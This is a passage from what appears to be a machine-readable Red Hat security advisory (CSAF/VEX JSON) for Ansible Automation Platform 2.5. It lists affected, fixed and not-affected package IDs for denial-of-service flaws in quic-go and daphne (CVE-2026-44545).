"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/quic-go/quic-go: quic-go: Denial of Service via excessive memory allocation in HTTP/3 trailers"
},
{
"cve": "CVE-2026-44545",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-03T15:01:49.007231+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484377"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in daphne. An unauthenticated remote attacker could exploit this vulnerability by sending arbitrarily large WebSocket messages or frames. This oversight in payload size handling can lead to excessive memory consumption, resulting in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "daphne: daphne: Denial of Service via excessive WebSocket message size",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
